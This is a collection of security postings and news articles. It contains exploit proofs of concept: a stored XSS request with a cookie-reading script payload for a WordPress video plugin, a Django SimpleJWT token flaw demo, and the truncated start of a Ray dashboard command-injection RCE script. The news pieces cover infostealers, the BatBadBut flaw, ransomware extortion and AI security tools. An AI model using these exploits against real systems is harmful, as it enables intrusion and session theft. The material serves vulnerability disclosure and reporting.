WordPress WP Video Playlist plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)# Date: 12 April 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.1.1# Proof Of Concept:1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w# Vulnerable Property at Request: videoFields[post_type]# Payload: <script>alert(document.cookie)</script># Request:POST /wp-admin/options.php HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 395Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=video_managerAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, ioption_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

Django REST Framework SimpleJWT versions 5.3.1 and below suffer from an information disclosure vulnerability.

    # Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure# Date: 26/01/2024# Exploit Author: Dhrumil Mistry (dmdhrumilmistry)# Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/# Software Link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1# Version: <= 5.3.1# Tested on: MacOS# CVE : CVE-2024-22513# The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable.# This vulnerability has the potential to cause various security issues,# including Business Object Level Authorization (BOLA), Business Function# Level Authorization (BFLA), Information Disclosure, etc. The vulnerability# arises from the fact that a user can access web application resources even# after their account has been disabled, primarily due to the absence of proper# user validation checks.# If a programmer generates a JWT token for an inactive user using`AccessToken`# class and `for_user` method then a JWT token is returned which canbe used for# authentication across the django and django rest framework application.# Start Django Shell using below command:# python manage.py shell# ----------------------------------------# Create inactive user and generate token for the userfrom django.contrib.auth.models import Userfrom rest_framework_simplejwt.tokens import AccessToken# create inactive userinactive_user_id = User.objects.create_user('testuser','test@example.com', 'testPassw0rd!', is_active=False).id# django application programmer generates token for the inactive userAccessToken.for_user(User.objects.get(id=inactive_user_id))  # errorshould be raised since user is inactive# django application verifying user tokenAccessToken.for_user(User.objects.get(id=inactive_user_id)).verify() #no exception is raised during verification of inactive user token

Django REST Framework SimpleJWT 5.3.1 Information Disclosure

A Russian-language cyberattack campaign impersonates legitimate game operations to spread various cross-platform infostealers.

Source: Stockphoto Graph via Shutterstock

A Russian threat actor is peppering game developers with fraudulent Web3 gaming projects that drop multiple variants of infostealers on both MacOS and Windows devices.

The ultimate goal of the campaign appears to be defrauding victims and stealing their cryptocurrency wallets, according to Recorded Future's Insikt Group, which discovered the malicious activity.

The extensive Russian-language campaign mimics legitimate projects by using slight alterations in project names and branding — even going so far as to have multiple fake social-media accounts impersonating the projects to make them seem authentic, according to a report published online.

In the attack, the main webpage of a project offers or links to installation files for the purported "game" software, ostensibly for use by developers. However, these files instead deliver either Atomic macOS Stealer for Intel- or ARM-based devices; Rhadamanthys; or RisePro, depending on the victim's operating system.

"The targeted nature of this campaign suggests that threat actors may perceive Web3 gamers as having a more acute vulnerability to social engineering, due to an assumed trade-off in cyber hygiene — meaning that Web3 gamers may have fewer protections in place against cybercrime — in the pursuit of profit," according to the report.

That profit comes in the form of cryptocurrency, as the actor is primarily targeting developers' crypto wallets with the intent of compromising those wallets. Web3 gaming refers to online games such as Axie Infinity and MixMob that are built on blockchain technology, which can result in financial gain for players who earn various cryptocurrencies.

"As wallet compromise continues to be the biggest threat in both Web3 and cryptocurrency security … we assess that wallet compromise is likely the end goal of this campaign," according to Insikt Group. Attackers also can use credentials harvested from the malicious activity "for an array of unauthorized account accesses," according to the report.

Indeed, the report outlines several social media reports of game developers falling victim to the scam and having their crypto wallets drained, including one who lost about 2.5 Ethereum, or about $8,000.

**Setting a Trap Through Impersonation**

The attack campaign comes in the form of what's called "trap phishing," whereby malicious actors duplicate and deploy Web3 project lookalikes.

Insikt researchers began investigating the malicious activity after Web3 smart contract auditor CertiK described a project in January called Astration that used fake job openings and non-fungible token NFT offerings to lure game developers into a trap-phishing campaign that spread infostealers.

The fraudulent project duplicated and recreated nearly all of the social media accounts associated with a legit project called Alteration, including reposting social-media content from legitimate accounts, establishing a direct copy of the project's Discord server, and delivering two types of malware.

Upon further research, Insikt found five additional fraudulent gaming projects, three of which were serving malicious files communicating with the same command-and-control (C2) server as those obtained from the Astration project, as well as two that were no longer active but were found to be similar to the active scams. Purported game names associated with the active projects were ArgonGame, DustFighter, and CosmicWay Reboot, while games associated with the inactive projects were Crypterium World and Myth Island.

Overall, the threat actors are delivering the campaign via "a resilient infrastructure, allowing them to quickly adapt by rebranding or shifting focus upon detection," according to Insikt.

**Maintain Vigilance to Mitigate Risk**

Insikt highlighted the necessity for both individuals and organizations to maintain continuous vigilance against threats and adopt mitigation strategies against campaigns that use phishing as an initial entry point. To that end, the group offered a number of mitigations in its report as well as included a list of indicators of compromise.

One is to provide comprehensive training to users — especially those involved in Web3 gaming or related industries — to recognize social engineering tactics associated with trap phishing. Game developers in particular should "scrutinize the legitimacy of Web3 projects advertised on social media," according to the report.

Organizations also should educate users on the well-known risks associated with downloading software from unverified sources and the importance of verifying the authenticity of project websites before installation.

Endpoint protection solutions updated with the latest threat intelligence — such as antivirus software that are capable of detecting and blocking known infostealer variants like Atomic, Stealc, Rhadamanthys, and RisePro — also can help organizations avoid compromise.

Organizations should also deploy multi-platform security measures to protect against malware infections across both macOS and Windows devices, including firewalls, intrusion detection systems, and endpoint detection and response (EDR) solutions, according to Insikt.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Web3 Game Developers Targeted in Crypto Theft Scheme

By Uzair Amir
Worried about prying eyes? We explain how messenger apps keep your chats confidential with features like encryption & multi-factor authentication.  Learn about security risks & emerging technologies for a safer digital future.
This is a post from HackRead.com Read the original post: Texting Secrets: How Messenger Apps Guard Your Chats

In today’s digital age, conversations are more online than face-to-face; hence, we must be careful with our messages. The widely used **messenger applications** designed for modern communication have advanced greatly in ensuring that our chat remains confidential. However, what measures are taken by such systems to keep our conversations safe from any malicious activity?

****End-to-End Encryption****

This security measure ensures that messages are decrypted only by the intended users. With end-to-end encryption, decryption is only possible by the receiver – the third party cannot intercept or **eavesdrop on the message**.

WhatsApp and Telegram are some chat applications that employ this encryption to secure user chat. Encryption of messages occurs “at the end” with the sender, and it can only be decrypted when it reaches the intended receiver “at the other end”; therefore creating a problem even for the messaging companies that would wish to decrypt and read the messages.

****Security Measures Beyond Encryption****

*   **Two-Factor Authentication (2FA):** To improve security, two-factor authentication requires users to enter a code that is sent to their mobile phone apart from the usual login details. This makes it much safer against unauthorized hackers when passwords get stolen to send **messenger hacked** links and gain access to sensitive accounts.
*   **Biometric Authentication:** Messenger applications can benefit from convenient and safe biometric authentication options like fingerprint and facial recognition. Through the use of individual biological attributes, it guarantees that only the authorized user can unlock their conversations.
*   **Secure Messaging Protocols:** Messenger applications are built on secure messaging protocols (like the Signal Protocol or the Off-the-Record Messaging protocol), enabling encrypted communication channels among different individuals. These protocols ensure that the message remains private even during any attack on the network.

****Challenges and Vulnerabilities********Phishing Attacks****

The security of messenger apps is still seriously threatened by **phishing attacks** when cybercriminals make efforts to deceive people and disclose their login details as well as other important data. Mitigation of this risk requires education as well as awareness about phishing techniques.

**Messenger app security** is also at risk from social engineering tactics like impersonation or manipulation. People must stay alert and suspicious of any odd messages or friend requests coming from unfamiliar ones; rather, they must confirm that the sender is who they claim to be before giving out any confidential data.

****Device Security Risks****

Messenger app communication may be unsafe due to weaknesses in device security, such as malware or **insecure Wi-Fi networks**. To prevent this, it is important to have regular software updates, antivirus software and secure network connections.

****Emerging Technologies in Chat Security****

*   **Quantum Cryptography:** Quantum mechanics is used in quantum cryptography to ensure that data is stored in quantum states, resulting in high levels of safety. Although it is still being considered as an attempt, quantum cryptography provides a potential solution to secure messaging encryption.
*   **Blockchain-Based Messaging Platforms:** With blockchain technology, it becomes possible to have messaging systems which do not centralize message data but rather store it across a distributed network, making it almost impossible for someone to corrupt or prevent certain messages from passing through. The **blockchain messaging applications** enhance safety as well as confidentiality through open and unchangeable message logs.
*   **AI-Powered Threat Detection:** In messenger applications today, there is a growing trend of utilizing artificial intelligence as well as machine learning algorithms to identify and deal with security threats. These systems analyze user activities, messages exchanged, as well as network flow metadata to detect, prevent and respond immediately to any breaches of security.

****Balancing Security and Usability****

Although it is important to have strong security systems, messenger applications need to balance between security and ease of use to be convenient. The flow of messages must not be disrupted, and there should be no negative impact on user experience as a result of complicated security protocols.

****The Future of Secure Messaging****

The landscape of chat security will change with advancing technology. The security of messenger applications will be improved by developments in **encryption algorithms**, authentication mechanisms, and threat detection technologies to guarantee that our conversations remain confidential and safe within cyberspace.

To promote secure communication, it is crucial to educate people on how they can stay safe and why privacy matters. Messaging platforms take part in user awareness programs that emphasize risks posed by hackers and promote preventative security steps.

The security of our conversations is very important at a time when digital communication is dominant. Many security features are used by messaging applications such as end-to-end encryption, biometric authentication, etc., to protect our conversations against any threats.

Nonetheless, the pace at which cyber threats change and develop means that new forms of securing chats must be continuously created. To achieve this, we have to keep on guard and adopt new technologies so that our conversations will stay private and safe.

1.  Zama Secures $73M Series A Lead for Homomorphic Encryption
2.  WhatsApp Encryption Explained — “Everything is not what it seems”
3.  Encrypted Email Service ProtonMail Supports Physical Security Keys

Texting Secrets: How Messenger Apps Guard Your Chats

By Deeba Ahmed
Critical 'BatBadBut' Flaw in Windows Lets Hackers Inject Commands (Patch Now!)
This is a post from HackRead.com Read the original post: Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

Flatt Security has discovered a critical vulnerability called “BatBadBut” that could allow attackers to inject malicious commands into Windows applications. The flaw, discovered by Flatt Security’s security engineer RyotaK, affects multiple programming languages. It was reported to the CERT Coordination Center and registered as CVE-2024-24576 on GitHub with a severity score of 10.0.

****What’s the Issue?****

Windows Rust developers are being urged to update their versions due to a critical vulnerability called ‘BatBadBut’, which could lead to malicious command injections on machines. The vulnerability affects the Rust standard library, which improperly escaped arguments when invoking batch files on Windows using the Command API.

BatBadBut vulnerability allows attackers to inject commands into Windows applications that rely on the ‘CreateProcess’ function. This is because cmd.exe, which executes batch files, has complex parsing rules and programming language runtimes fail to escape command arguments properly.

****Why it Occurs?****

The ‘BatBadBut’ issue occurs from the interaction between programming languages and the Windows operating system. When a program calls the “CreateProcess” function, Windows launches a separate process, “cmd.exe,” to handle the execution. This separate process parses the commands in the .bat file. 

For your information, Windows by default includes .bat and.cmd files in the PATHEXT environment variable, which can cause runtimes to execute batch files against developers’ intentions. An attacker can inject commands into Windows applications by controlling the command arguments section of batch files. To do this, the application must execute a command on Windows, specify the command file extension, control the command arguments, and fail to escape them.

“Some runtimes execute batch files against the developers’ intention if there is a batch file with the same name as the command that the developer intended to execute,” ” Ryotak explained.

****Impacted Applications****

Haskell process library, Rust, Node.js, PHP, and yt-dlp are affected by this bug. The Rust Security Response Working Group was notified on April 9 2024 that the Rust standard library, which is used to invoke batch files on Windows, is not properly escaping arguments, allowing attackers to execute arbitrary shell commands by bypassing the escaping. Haskell, Rust, and yt-dlp have issued patches.  

Ryotak reports that this isn’t an “internet breaking vulnerability” and most applications are not affected by it with several mitigations already available. Some programming languages have addressed it by adding an escaping mechanism. In addition, BatBadBut only affects Rust versions before 1.77.2, affecting no other platform or use.

****Mitigation Strategies:****

Researchers advise developers to exercise caution when using functions that interact with external processes, especially when dealing with user-supplied data. They recommend validating and sanitizing user input before incorporating it into commands, using safe alternatives, and staying updated with the latest security patches and fixes provided by framework and library developers.

1.  Rust-Based macOS Backdoor Linked to Ransomware Gangs
2.  Windows Defender SmartScreen Flaw Exploited with Malware
3.  Rust-Based Injector Deploys Remcos RAT in Multi-Stage Attack

Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

Our collection of the most relevant reporting and industry perspectives for those guiding cybersecurity strategies and focused on SecOps. Also included: facing hard truths in software security, and the latest guidance from the NSA.

Source: Chroma Craft Media Group via Alamy Stock Photo

Welcome to CISO Corner, Dark Reading's weekly digest of articles tailored specifically to security operations readers and security leaders. Every week, we offer articles gleaned from across our news operation, The Edge, DR Technology, DR Global, and our Commentary section. We're committed to bringing you a diverse set of perspectives to support the job of operationalizing cybersecurity strategies, for leaders at organizations of all shapes and sizes.

**In this issue of CISO Corner**

*   The Race for AI-Powered Security Platforms Heats Up
    
*   Why MLBOMs Are Useful for Securing the AI/ML Supply Chain
    
*   The Fight for Cybersecurity Awareness
    
*   Ambitious Training Initiative Taps Talents of Blind and Visually Impaired
    
*   Vietnamese Cybercrime Group CoralRaider Nets Financial Data
    
*   XZ Utils Scare Exposes Hard Truths About Software Security
    
*   NSA Updates Zero-Trust Advice to Reduce Attack Surfaces
    

**The Race for AI-Powered Security Platforms Heats Up**

By Robert Lemos, Contributing Writer, Dark Reading

Microsoft, Google, and Simbian each offers generative AI systems that allow security operations teams to use natural language to automate cybersecurity tasks.

Both Google and Microsoft have committed massive resources to developing generative artificial intelligence (AI) tools for cybersecurity. Security Copilot from Microsoft can find breaches, gather, and analyze data with help from generative AI. Google's Gemini in Security is a similar rival service.

Now a startup has entered the fray, Simbian, with its own system that leverages generative AI as well as large language models (LLMs) to help security teams by automating configuring event management systems (SIEM) or security orchestration, automation, and response (SOAR).

While each offering has its own set of benefits, they all strive to streamline processes for strained cybersecurity teams. The question that has yet to be answered is whether teams will ultimately trust the automated systems to operate as intended.

Read more: The Race for AI-Powered Security Platforms Heats Up

Related: How AI and Automation Can Help Bridge the Cybersecurity Talent Gap

**Why MLBOMs Are Useful for Securing the AI/ML Supply Chain**

Commentary By Diana Kelley, CISO, Protect AI

A machine learning bill of materials (MLBOM) framework can bring transparency, auditability, control, and forensic insight into AI and ML supply chains.

The software bill of materials (SBOM) has become an essential tool for identifying the code that makes up an application, but in the age of artificial intelligence (AI) the SBOM has some limitations in machine learning frameworks.

A machine learning software bill of materials, or MLBOM, could fill the gaps left in a traditional SBOM and add protections to data and assets.

Read More: Why MLBOMs Are Useful for Securing the AI/ML Supply Chain

Related: Where SBOMs Stand Today

**  
The Fight for Cybersecurity Awareness**

Commentary By Erik Gross, CISO, QAD

Investing in cybersecurity skills creates a safer digital world for everyone.

Spreading awareness of risk is the best way to mitigate cybersecurity risk, but the task of constantly training and re-training people on the latest threats can be daunting. The age of artificial intelligence is making it even more difficult.

Building a culture of security is paramount, and it can be achieved with thoughtful cybersecurity training with a focus on a personal approach, storytelling, and helping people feel comfortable talking openly about cybersecurity. Humans are unpredictable, and a cybersecurity training process that accepts that humans are complex creatures have had the most success.

Read More: The Fight for Cybersecurity Awareness

Related: Q&A: The Cybersecurity Training Gap in Industrial Networks

**Ambitious Training Initiative Taps Talents of Blind and Visually Impaired**

By Jennifer Lawinski, Contributing Writer, Dark Reading

Novacoast's Apex Program prepares individuals with visual impairments for cybersecurity careers.

Blind and visually impaired (BVI) people are an untapped talent resource for cybersecurity companies struggling to attract talent. With just a computer outfitted with a screen reader and Braille keyboard, BVI people can become valuable contributors. Two cyber CEOs have launched Apex Program, an online, on-demand course for BVI people who want to break into cybersecurity.

So far, four students have completed the course and one has already landed a job as a SOC 1 Analyst. Now the White House is getting involved, and there's even a short film in the works featuring the Apex Program.

Read More: Ambitious Training Initiative Taps Talents of Blind and Visually Impaired

Related: 3 Ways Businesses Can Overcome the Cybersecurity Skills Shortage

**Vietnamese Cybercrime Group CoralRaider Nets Financial Data**

By Robert Lemos, Contributing Writer, Dark Reading

With a complex attack chain and using Telegram for its command and control, CoralRaider targets victims in Asian countries — and appears to have accidentally infected itself as well.

A newcomer on the Vietnamese cybercrime scene, a group called CoralRaider is making moves — and rookie mistakes like infecting their own systems — along the way.

Security researchers at Cisco Talos have been tracking CoralRaider's activities and found they are motivated by profit, even though the group is having trouble getting their operation off the ground. So far, Cisco Talos analysts haven't seen any indication CoralRaider has yet successfully delivered a payload, but the group is actively working to improve their cybercrime skills.

Read More: Vietnamese Cybercrime Group CoralRaider Nets Financial Data

Related: Ransomware, Junk Bank Accounts: Cyber Threats Proliferate in Vietnam

**  
XZ Utils Scare Exposes Hard Truths About Software Security**

By Jai Vijayan, Contributing Writer, Dark Reading

Much of the open source code embedded in enterprise software stacks comes from small, under-resourced, volunteer-run projects.

The backdoor recently discovered in the XZ Utils tool should be a wake-up call for cyber teams that open source repositories are riddled with vulnerabilities.

These projects are volunteer-run, under-resourced, and unable to keep up with the latest threats. XZ Utils is itself a one-person operation. Enterprises using code from these open sources do so at their own risk.

Organizations are advised to vet their use of code from public repositories and determine whether they have appropriate security controls. Experts also recommend having engineering and cybersecurity teams define processes and roles for onboarding open source code.

Read More: XZ Utils Scare Exposes Hard Truths About Software Security

**NSA Updates Zero-Trust Advice to Reduce Attack Surfaces**

By Dark Reading Staff

Agency encourages broader use of encryption, data-loss prevention, as well as data rights management to safeguard data, networks, and users.

In its ongoing effort to provide both the public, as well as the private, sectors with support in getting on a path to zero trust, the National Security Administration has issued guidance related to data protection, or as NSA categorizes it, the "data pillar." Recommendations from the agency include the use of encryption, tagging, labeling, and more.

Prior to this data security guidance, NSA provided a detailed guide to network macro- and micro-segmentation and its role in building up a zero-trust framework.

Read More: NSA Updates Zero-Trust Advice to Reduce Attack Surfaces

Related: NSA's Zero-Trust Guidelines Focus on Segmentation

CISO Corner: Securing the AI Supply Chain; AI-Powered Security Platforms; Fighting for Cyber Awareness

Change Healthcare ransomware hackers already received a $22 million payment. Now a second group is demanding money, and it has sent WIRED samples of what they claim is the company's stolen data.

For months, Change Healthcare has faced an immensely messy ransomware debacle that has left hundreds of pharmacies and medical practices across the United States unable to process claims. Now, thanks to an apparent dispute within the ransomware criminal ecosystem, it may have just become far messier still.

In March, the ransomware group AlphV, which had claimed credit for encrypting Change Healthcare’s network and threatened to leak reams of the company’s sensitive health care data, received a $22 million payment—evidence, publicly captured on Bitcoin’s blockchain, that Change Healthcare had very likely caved to its tormentors’ ransom demand, though the company has yet to confirm that it paid. But in a new definition of a worst-case ransomware, a _different_ ransomware group claims to be holding Change Healthcare’s stolen data and is demanding a payment of their own.

Since Monday, RansomHub, a relatively new ransomware group, has posted to its dark-web site that it has 4 terabytes of Change Healthcare’s stolen data, which it threatened to sell to the “highest bidder” if Change Healthcare didn’t pay an unspecified ransom. RansomHub tells WIRED it is not affiliated with AlphV and “can’t say” how much it’s demanding as a ransom payment.

RansomHub initially declined to publish or provide WIRED any sample data from that stolen trove to prove its claim. But on Friday, a representative for the group sent WIRED several screenshots of what appeared to be patient records and a data-sharing contract for United Healthcare, which owns Change Healthcare, and Emdeon, which acquired Change Healthcare in 2014 and later took its name.

While WIRED could not fully confirm RansomHub’s claims, the samples suggest that this second extortion attempt against Change Healthcare may be more than an empty threat. “For anyone doubting that we have the data, and to anyone speculating the criticality and the sensitivity of the data, the images should be enough to show the magnitude and importance of the situation and clear the unrealistic and childish theories,” the RansomHub contact tells WIRED in an email.

Change Healthcare didn’t immediately respond to WIRED’s request for comment on RansomHub’s extortion demand.

Brett Callow, a ransomware analyst with security firm Emsisoft, says he believes AlphV did not originally publish any data from the incident, and the origin of RansomHub’s data is unclear. “I obviously don't know whether the data is real—it could have been pulled from elsewhere—but nor do I see anything that indicates it may not be authentic,” he says of the data shared by RansomHub.

Jon DiMaggio, chief security strategist at threat intelligence firm Analyst1, says he believes RansomHub is “telling the truth and does have Change HealthCare’s data,” after reviewing the information sent to WIRED. While RansomHub is a new ransomware threat actor, DiMaggio says, they are quickly “gaining momentum.”

If RansomHub’s claims are real, it will mean that Change Healthcare’s already catastrophic ransomware ordeal has become a kind of cautionary tale about the dangers of trusting ransomware groups to follow through on their promises, even after a ransom is paid. In March, someone who goes by the name “notchy” posted to a Russian cybercriminal forum that AlphV had pocketed that $22 million payment and disappeared without sharing a commission with the “affiliate” hackers who typically partner with ransomware groups and often penetrate victims’ networks on their behalf.

Notchy’s post suggested that Change Healthcare faced an unprecedented situation: It had allegedly already paid a ransom, yet jilted partners of the gang extorting it still felt they were owed money—and still possessed Change Healthcare’s stolen data. RansomHub tells WIRED it is associated with notchy.

Now, RansomHub has claimed “the data remains with the affiliate,” and AlphV did not directly have the data originally. WIRED could not verify these claims. “For everyone speculating and theorizing on the situation, AlphV stole our share of the payment and performed an exit scam,” a RansomHub representative wrote to WIRED. “AlphV performed the exit scam before we get to the data deletion part.”

Callow says the incident reinforces that cybercriminals can’t be trusted to delete data, even when they are paid. For example, when a global law enforcement operation disrupted the notorious LockBit ransomware group, in February, police said they discovered that the cybercriminals still had data that investigators had paid to be deleted.

“Sometimes they use the undeleted data to extort victims for a second time, and the risk of re-extortion will only increase as law enforcement up their disruption efforts and throw the ransomware ecosystem into chaos,” Callow says. “What were always unpredictable outcomes will now be even more unpredictable.”

Similarly, DiMaggio says victims of ransomware attacks need to learn they can’t trust cybercriminals. “Victims need to understand that paying a criminal who promises to delete their data permanently is a myth,” DiMaggio says. “They are paying to have their data taken off the public side of the ransomware attackers data leak site. They should assume it is never actually deleted.”

UnitedHealth Group’s website says it is continuing to “make progress in mitigating the impact” of the attack and expanding financial assistance to health care providers that have been impacted. However, the attack has sent long-lasting ripples across medical facilities in the United States, demonstrating how disruptive ransomware attacks can be and the difficulties in restoring services. Clinicians and patients alike have been impacted, with extra strain being placed upon medical business owners.

On Wednesday, the American Medical Association said “serious disruptions continue” across physician practices. A survey of AMA members, conducted between March 26 and April 3, found 80 percent of clinicians had lost revenue and many are using their own personal finances to cover a practice’s expenses. Medical practitioners responding to the survey said they were heading toward bankruptcy, were struggling to “manage pain care” for cancer patients, and that procedures had been delayed. “Practices will close because of this incident,” Jesse M. Ehrenfeld, the president of the AMA said in a statement, “and patients will lose access to their physicians.”

In a message to WIRED, the RansomHub contact claims—for whatever the word of a ransomware gang is worth—that they are different from other cybercriminals, and if Change Healthcare pays them, they wouldn’t try to extort it again. “We will delete the data,” they write. “This data is a bomb for us. If we can't get payment, we have no choice but to sell it. Of course, if we can reach an agreement, it will be better to delete the data and throw the bomb away.”

Change Healthcare Faces Another Ransomware Threat—and It Looks Credible

Microsoft, Google, and Simbian each offers generative AI systems that allow security operations teams to use natural language to automate cybersecurity tasks.

Source: Ole.CNX via Shutterstock

When a major vulnerability shakes up the cybersecurity world — such as the recent XZ backdoor or the Log4j2 flaws of 2021 — the first question that most companies ask is, "Are we affected?" In the absence of well-written playbooks, the simple question can require a great deal of effort to answer.

Microsoft and Google are investing heavily in generative artificial intelligence (GenAI) systems that can turn large security questions into concrete actions, assist security operations, and, increasingly, take automated actions. Microsoft offers overworked security operations centers with Security Copilot, a GenAI-based service that can identify breaches, connect threat signals, and analyze data. And Google's Gemini in Security is a collection of security capabilities powered by the company's Gemini GenAI.

Startup Simbian is joining the race with its new GenAI-based platform for helping companies tackle their security operations. Simbian's system combines large language models (LLMs) for summarizing data and understanding native languages, other machine learning models to connect disparate data points, and a software based expert system based on security information culled from the Internet.

Where configuring a security information and event management system (SIEM) or a security orchestration, automation, and response (SOAR) system could take weeks or months, using AI cuts the time to — in some cases — seconds, says Ambuj Kumar, co-founder and CEO of Simbian.

"With Simbian, literally, these things are done in seconds," he says. "You ask a question, you express your goal in natural language, we break into steps code execution, and this is all done automatically. It's self sufficient."

Helping overworked security analysts and incident responders streamline their jobs is a perfect application for the more powerful capabilities of GenAI, says Eric Doerr, vice president of engineering at Google Cloud.

"The opportunity in security is particularly acute given the elevated threat landscape, the well publicized talent gap in cybersecurity professionals, and the toil that is the status quo in most security teams," Doerr says. "Accelerating productivity and driving down mean time to detect, respond, and contain \[or\] mitigate threats through the use of GenAI will enable security teams to catch up and defend their organizations more successfully."

**Different Starting Points, Different 'Advantages'**

Google's advantages in the market are evident. The IT and Internet giant has the budget to stay the course, the technical expertise in machine learning and AI from its DeepMind projects to innovate, and access to a lot of training data — a critical consideration for creating LLMs.

"We have a tremendous amount of proprietary data that we've used to train a custom security LLM — SecLM — which is part of Gemini for Security," Doerr says. "This is the superset of 20 years of Mandiant intelligence, VirusTotal, and more, and we're the only platform that has an open API — part of Gemini for Security — that allows partners and enterprise customers to extend our security solutions and have a single AI that can operate with all the context of the enterprise."

Like Simbian's guidance, Gemini in Security Operations — one capability under the Gemini in Security umbrella — will assist in investigations starting at the end of April, guiding the security analyst and recommending actions from within Chronicle Enterprise.

Simbian uses natural language queries to generate results, so asking, "Are we affected by the XZ vulnerability?" will produce a table of IP addresses of vulnerable applications. The systems also uses curated security knowledge gathered from Internet to create guidebooks for security analysts that show them a script of prompts to give to the system to accomplish a specific task.

"The guidebook is a way of personalizing or creating trusted content," says Simbian's Kumar. "Right now, we are creating the guidebooks, but once ... people just start to use it, then they can create their own."

**Strong ROI Claims for LLMs**

The returns on investment will grow as companies move from a manual process to an assisted process to autonomous activity. Most GenAI-based systems have advanced only to the stage of an assistant or copilot, when it suggests actions or takes only a limited series of actions, after gaining the users permissions.

The real return on investment will come later, Kumar says.

"What we are excited about building is autonomous — autonomous is making decisions on your behalf that are within the scope of guidance you have given it," he says.

Google's Gemini also seems to straddle the gap between an AI assistant and an automated engine. Financial services firm Fiserv is using Gemini in Security Operations for creating detections and playbooks faster and with less effort, and for helping security analysts quickly find answers using natural language search, boosting the productivity of security teams, Doerr says.

Yet trust is still an issue and a hurdle for increased automation, he says. To bolster trust in the system and solutions, Google remains focused on creating explainable AI systems that are transparent in how they come to a decision.

"When you use a natural language input to create a new detection, we show you the detection language syntax and you choose to run that," he says. "This is part of the process of building confidence and context with Gemini for Security."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

The Race for AI-Powered Security Platforms Heats Up

The Ray Project dashboard contains a CPU profiling page, and the format parameter is not validated before being inserted into a system command executed in a shell, allowing for arbitrary command execution. If the system is configured to allow passwordless sudo (a setup some Ray configurations require) this will result in a root shell being returned to the user. If not configured, a user level shell will be returned. Versions 2.6.3 and below are affected.

    # Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)# Description:#  The Ray Project dashboard contains a CPU profiling page, and the format parameter is#  not validated before being inserted into a system command executed in a shell, allowing#  for arbitrary command execution. If the system is configured to allow passwordless sudo#  (a setup some Ray configurations require) this will result in a root shell being returned#  to the user. If not configured, a user level shell will be returned# Version: <= 2.6.3# Date: 2024-4-10# Exploit Author: Fire_Wolf# Tested on: Ubuntu 20.04.6 LTS# Vendor Homepage: https://www.ray.io/# Software Link: https://github.com/ray-project/ray# CVE: CVE-2023-6019# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe# ==========================================================================================# !usr/bin/python3# coding=utf-8import base64import argparseimport requestsimport urllib3proxies = {"http": "127.0.0.1:8080"}headers = {    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}def check_url(target, port):    target_url = target + ":" + port    https = 0    if 'http' not in target:        try:            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)            test_url = 'http://' + target_url            response = requests.get(url=test_url, headers=headers, 